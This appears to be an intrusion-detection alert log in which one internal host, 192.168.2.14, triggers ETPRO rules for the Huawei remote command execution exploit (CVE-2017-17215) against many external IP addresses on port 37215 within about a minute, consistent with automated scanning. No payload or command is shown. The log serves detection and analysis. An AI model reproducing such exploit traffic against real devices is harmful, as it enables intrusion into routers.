                                                    07/10/24-08:26:43.793102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056037215192.168.2.14197.34.143.155
                                                    07/10/24-08:26:22.284234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557437215192.168.2.14157.252.76.73
                                                    07/10/24-08:27:10.629706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410437215192.168.2.1441.78.86.3
                                                    07/10/24-08:27:24.965936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201237215192.168.2.1441.76.253.40
                                                    07/10/24-08:27:10.625884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566037215192.168.2.1441.67.216.33
                                                    07/10/24-08:26:33.246495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.14157.79.146.109
                                                    07/10/24-08:27:20.460517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083037215192.168.2.14197.3.154.82
                                                    07/10/24-08:26:25.490780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306437215192.168.2.14157.59.228.87
                                                    07/10/24-08:26:57.661675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676237215192.168.2.1441.183.1.72
                                                    07/10/24-08:27:07.369689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977037215192.168.2.1441.205.26.202
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212837215192.168.2.14197.70.22.23
                                                    07/10/24-08:27:19.285885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588437215192.168.2.14157.142.86.164
                                                    07/10/24-08:27:33.945204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455637215192.168.2.1441.87.131.122
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685037215192.168.2.14205.215.224.98
                                                    07/10/24-08:27:20.474239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704237215192.168.2.14157.58.40.26
                                                    07/10/24-08:26:17.942691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581637215192.168.2.14222.185.137.191
                                                    07/10/24-08:27:30.553944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428037215192.168.2.14197.238.166.51
                                                    07/10/24-08:26:43.524057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260837215192.168.2.14197.197.27.62
                                                    07/10/24-08:26:36.395459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067837215192.168.2.14122.207.58.43
                                                    07/10/24-08:27:22.498081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993837215192.168.2.14197.67.210.136
                                                    07/10/24-08:26:28.775037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979037215192.168.2.1464.202.35.168
                                                    07/10/24-08:26:55.462338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470237215192.168.2.1488.34.30.230
                                                    07/10/24-08:26:31.098099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458637215192.168.2.1441.197.135.106
                                                    07/10/24-08:26:36.436089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812037215192.168.2.14197.242.136.162
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633837215192.168.2.1441.230.110.143
                                                    07/10/24-08:27:22.831755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184437215192.168.2.1441.175.40.71
                                                    07/10/24-08:26:36.340755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987837215192.168.2.1441.11.72.169
                                                    07/10/24-08:26:49.864771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086437215192.168.2.14197.50.123.37
                                                    07/10/24-08:27:11.547773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017037215192.168.2.1441.22.227.124
                                                    07/10/24-08:27:19.315595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886037215192.168.2.1441.112.190.173
                                                    07/10/24-08:26:41.535361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095237215192.168.2.14157.87.50.98
                                                    07/10/24-08:26:28.855166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994637215192.168.2.14157.219.50.211
                                                    07/10/24-08:26:49.855576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384237215192.168.2.1441.135.65.201
                                                    07/10/24-08:26:52.000964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312037215192.168.2.14210.21.54.135
                                                    07/10/24-08:26:57.584136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766037215192.168.2.14197.24.243.195
                                                    07/10/24-08:26:52.079207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840237215192.168.2.14157.210.91.10
                                                    07/10/24-08:26:59.839677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611237215192.168.2.14157.115.51.134
                                                    07/10/24-08:27:08.410833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755037215192.168.2.14157.87.94.196
                                                    07/10/24-08:27:19.352052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771037215192.168.2.14197.40.144.73
                                                    07/10/24-08:27:24.963171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982837215192.168.2.14197.95.60.17
                                                    07/10/24-08:26:18.027380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806637215192.168.2.1423.163.220.142
                                                    07/10/24-08:27:13.965572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558037215192.168.2.1441.93.164.79
                                                    07/10/24-08:27:19.320404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925837215192.168.2.14197.227.4.76
                                                    07/10/24-08:26:15.858486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770037215192.168.2.1461.254.165.95
                                                    07/10/24-08:26:26.617546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293837215192.168.2.14217.124.119.38
                                                    07/10/24-08:26:43.611517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.14191.129.158.22
                                                    07/10/24-08:26:59.751989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124037215192.168.2.14205.0.140.74
                                                    07/10/24-08:27:33.939106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705837215192.168.2.1471.0.114.170
                                                    07/10/24-08:26:48.018095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136837215192.168.2.14133.94.66.167
                                                    07/10/24-08:27:19.215093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082637215192.168.2.14197.9.74.144
                                                    07/10/24-08:26:59.858149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063637215192.168.2.1449.144.113.80
                                                    07/10/24-08:27:13.998710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894637215192.168.2.1441.218.55.224
                                                    07/10/24-08:26:38.605361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306037215192.168.2.14197.103.13.106
                                                    07/10/24-08:27:02.852572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842037215192.168.2.14157.216.235.12
                                                    07/10/24-08:26:13.781543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996037215192.168.2.14197.28.157.243
                                                    07/10/24-08:26:15.842184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651037215192.168.2.1441.179.70.218
                                                    07/10/24-08:26:38.548975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436637215192.168.2.14197.48.195.8
                                                    07/10/24-08:26:38.575059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443037215192.168.2.1413.234.82.19
                                                    07/10/24-08:26:13.837705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652237215192.168.2.1441.30.59.94
                                                    07/10/24-08:27:30.411033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467237215192.168.2.14197.160.207.55
                                                    07/10/24-08:26:23.342477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476437215192.168.2.14197.41.189.148
                                                    07/10/24-08:27:32.623300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797437215192.168.2.14157.176.177.185
                                                    07/10/24-08:26:38.567555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422837215192.168.2.14157.18.25.161
                                                    07/10/24-08:26:29.775868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659637215192.168.2.14165.131.6.89
                                                    07/10/24-08:26:11.583025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.14171.13.124.34
                                                    07/10/24-08:27:08.412825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.14148.204.228.124
                                                    07/10/24-08:26:23.357682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818437215192.168.2.1441.217.166.34
                                                    07/10/24-08:26:34.224904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325237215192.168.2.14157.159.179.30
                                                    07/10/24-08:27:08.437142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112837215192.168.2.14157.141.74.7
                                                    07/10/24-08:27:08.307803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286837215192.168.2.14157.129.132.228
                                                    07/10/24-08:26:43.923272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036237215192.168.2.1441.190.199.200
                                                    07/10/24-08:26:47.943853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054437215192.168.2.1441.137.71.119
                                                    07/10/24-08:26:57.501459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530437215192.168.2.1441.253.172.127
                                                    07/10/24-08:27:14.893689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386637215192.168.2.14157.147.16.139
                                                    07/10/24-08:26:43.888378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327837215192.168.2.1472.181.78.72
                                                    07/10/24-08:26:29.871003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677637215192.168.2.14197.92.60.238
                                                    07/10/24-08:26:43.763647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384637215192.168.2.14157.177.184.74
                                                    07/10/24-08:26:57.570720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825037215192.168.2.1441.190.75.77
                                                    07/10/24-08:27:13.970962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166037215192.168.2.14157.163.246.42
                                                    07/10/24-08:26:36.389134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576437215192.168.2.14102.200.21.139
                                                    07/10/24-08:27:20.396105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920037215192.168.2.1420.191.177.89
                                                    07/10/24-08:26:15.843639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716837215192.168.2.14157.184.148.251
                                                    07/10/24-08:26:13.831960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387237215192.168.2.14135.245.254.186
                                                    07/10/24-08:26:31.081950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188837215192.168.2.14138.212.227.228
                                                    07/10/24-08:27:33.681754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.1441.223.121.67
                                                    07/10/24-08:26:36.422019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559837215192.168.2.1441.171.225.92
                                                    07/10/24-08:26:53.135908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109837215192.168.2.14197.83.39.29
                                                    07/10/24-08:26:52.034591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915837215192.168.2.1463.105.45.118
                                                    07/10/24-08:27:22.834558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924037215192.168.2.14157.195.72.188
                                                    07/10/24-08:26:28.821569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365037215192.168.2.14197.52.159.133
                                                    07/10/24-08:26:13.645401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893237215192.168.2.1441.98.208.163
                                                    07/10/24-08:27:08.310609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433837215192.168.2.14197.241.209.129
                                                    07/10/24-08:27:31.530342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841437215192.168.2.14157.183.247.164
                                                    07/10/24-08:26:51.997172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070237215192.168.2.14197.181.47.131
                                                    07/10/24-08:27:02.710237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685837215192.168.2.14197.64.141.21
                                                    07/10/24-08:26:42.359553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798037215192.168.2.14157.135.200.97
                                                    07/10/24-08:26:14.764309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961837215192.168.2.1441.90.89.131
                                                    07/10/24-08:26:33.183618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741037215192.168.2.14197.188.134.133
                                                    07/10/24-08:26:57.510241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066437215192.168.2.1441.241.176.221
                                                    07/10/24-08:26:25.488855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238037215192.168.2.14197.224.222.113
                                                    07/10/24-08:27:33.942019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.14157.130.69.4
                                                    07/10/24-08:26:28.763825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875637215192.168.2.14114.100.30.187
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636237215192.168.2.14157.68.42.23
                                                    07/10/24-08:27:33.821123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945837215192.168.2.1441.82.60.41
                                                    07/10/24-08:27:07.268658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196237215192.168.2.1435.62.133.144
                                                    07/10/24-08:26:23.301289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121437215192.168.2.14194.56.58.218
                                                    07/10/24-08:27:27.146425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116237215192.168.2.14146.209.79.32
                                                    07/10/24-08:26:14.743404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952037215192.168.2.14157.235.247.90
                                                    07/10/24-08:26:23.347841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501437215192.168.2.1452.147.44.145
                                                    07/10/24-08:27:32.594360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520637215192.168.2.14197.72.89.236
                                                    07/10/24-08:26:11.578460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304437215192.168.2.1441.70.152.5
                                                    07/10/24-08:26:13.761894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099837215192.168.2.1441.64.116.206
                                                    07/10/24-08:26:47.864255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447037215192.168.2.14157.31.6.189
                                                    07/10/24-08:26:20.134395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.1437.128.251.215
                                                    07/10/24-08:26:20.134395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535837215192.168.2.14157.6.199.142
                                                    07/10/24-08:26:13.644987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144837215192.168.2.1417.35.241.140
                                                    07/10/24-08:26:33.165723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719437215192.168.2.14197.170.213.203
                                                    07/10/24-08:26:13.803264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801237215192.168.2.14197.38.45.218
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837637215192.168.2.14126.201.22.228
                                                    07/10/24-08:26:15.800070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277437215192.168.2.1441.239.190.70
                                                    07/10/24-08:27:14.831646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572837215192.168.2.1478.192.108.39
                                                    07/10/24-08:27:19.349991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052037215192.168.2.14157.15.254.254
                                                    07/10/24-08:26:45.619153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.14207.156.47.212
                                                    07/10/24-08:26:52.043481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473837215192.168.2.1441.178.185.144
                                                    07/10/24-08:26:59.858149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278037215192.168.2.14197.240.203.105
                                                    07/10/24-08:27:17.000608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725237215192.168.2.1431.14.196.215
                                                    07/10/24-08:26:44.495455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002637215192.168.2.1441.223.14.75
                                                    07/10/24-08:27:24.913087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934037215192.168.2.14116.164.243.68
                                                    07/10/24-08:26:59.714271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571037215192.168.2.1441.230.80.139
                                                    07/10/24-08:27:17.099903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216237215192.168.2.14197.21.247.139
                                                    07/10/24-08:27:13.879292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745437215192.168.2.14157.0.176.93
                                                    07/10/24-08:26:20.185610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805437215192.168.2.1418.164.216.241
                                                    07/10/24-08:26:25.514525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697837215192.168.2.14157.162.84.240
                                                    07/10/24-08:26:11.131677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487437215192.168.2.14171.128.195.137
                                                    07/10/24-08:26:42.388281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680837215192.168.2.14197.62.37.124
                                                    07/10/24-08:27:07.389175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117037215192.168.2.14103.254.41.232
                                                    07/10/24-08:26:14.757846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.14124.131.154.65
                                                    07/10/24-08:27:10.609289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847637215192.168.2.14128.254.77.231
                                                    07/10/24-08:26:33.199657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801837215192.168.2.14103.197.216.129
                                                    07/10/24-08:27:13.986836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.1486.37.178.104
                                                    07/10/24-08:27:31.532257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654037215192.168.2.14197.150.218.134
                                                    07/10/24-08:26:55.471512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617237215192.168.2.14152.77.74.213
                                                    07/10/24-08:26:11.661764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342237215192.168.2.1441.233.2.240
                                                    07/10/24-08:26:33.240752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308037215192.168.2.14117.238.125.161
                                                    07/10/24-08:26:15.870897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750437215192.168.2.1465.147.253.74
                                                    07/10/24-08:26:52.037168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319237215192.168.2.14197.102.167.151
                                                    07/10/24-08:26:26.615804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307837215192.168.2.14197.248.148.96
                                                    07/10/24-08:26:49.842206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751837215192.168.2.14197.96.62.100
                                                    07/10/24-08:26:13.852181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335837215192.168.2.14157.40.244.181
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273437215192.168.2.14157.144.200.180
                                                    07/10/24-08:27:19.163941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875437215192.168.2.14197.133.70.28
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695037215192.168.2.1441.245.146.71
                                                    07/10/24-08:26:36.365413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763037215192.168.2.1441.19.187.173
                                                    07/10/24-08:27:22.929011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755437215192.168.2.1413.19.255.210
                                                    07/10/24-08:27:20.501518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284037215192.168.2.14157.51.95.13
                                                    07/10/24-08:26:59.856885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918237215192.168.2.14197.88.162.155
                                                    07/10/24-08:27:05.209261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078037215192.168.2.14156.164.18.47
                                                    07/10/24-08:27:10.647678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857837215192.168.2.14197.247.251.74
                                                    07/10/24-08:27:19.259031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898437215192.168.2.1493.45.233.244
                                                    07/10/24-08:26:11.446922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134837215192.168.2.14210.21.110.251
                                                    07/10/24-08:26:31.065444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.1441.67.74.223
                                                    07/10/24-08:26:42.353895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988637215192.168.2.1418.59.3.132
                                                    07/10/24-08:26:22.262927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066237215192.168.2.1435.180.222.151
                                                    07/10/24-08:26:15.861470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498437215192.168.2.14157.200.37.58
                                                    07/10/24-08:26:34.239343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994237215192.168.2.14157.131.52.255
                                                    07/10/24-08:26:52.048430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117637215192.168.2.14197.25.194.71
                                                    07/10/24-08:27:10.554051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807437215192.168.2.1453.120.106.194
                                                    07/10/24-08:26:29.857933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860037215192.168.2.14216.116.218.169
                                                    07/10/24-08:26:51.973462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309237215192.168.2.1441.110.44.60
                                                    07/10/24-08:27:17.055063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337637215192.168.2.1441.229.74.131
                                                    07/10/24-08:27:19.146990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168237215192.168.2.1441.25.90.5
                                                    07/10/24-08:26:57.625074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035037215192.168.2.14197.171.213.254
                                                    07/10/24-08:26:23.308170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944037215192.168.2.1441.62.201.189
                                                    07/10/24-08:26:13.664238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596637215192.168.2.1441.88.70.4
                                                    07/10/24-08:27:07.286969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011037215192.168.2.1441.197.150.0
                                                    07/10/24-08:27:08.456007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512437215192.168.2.14197.87.156.197
                                                    07/10/24-08:27:10.621432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411637215192.168.2.14198.199.209.28
                                                    07/10/24-08:26:23.352654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249037215192.168.2.14197.215.225.188
                                                    07/10/24-08:27:24.976551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081637215192.168.2.1441.158.228.62
                                                    07/10/24-08:26:45.673151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500437215192.168.2.14197.65.48.54
                                                    07/10/24-08:27:27.072006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890837215192.168.2.1441.50.69.188
                                                    07/10/24-08:26:34.217028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850837215192.168.2.1441.90.118.153
                                                    07/10/24-08:27:08.334511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429837215192.168.2.14197.222.189.12
                                                    07/10/24-08:26:49.802852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428037215192.168.2.14157.72.23.109
                                                    07/10/24-08:27:22.926271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346237215192.168.2.1462.245.25.101
                                                    07/10/24-08:26:28.739643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489237215192.168.2.14101.67.36.101
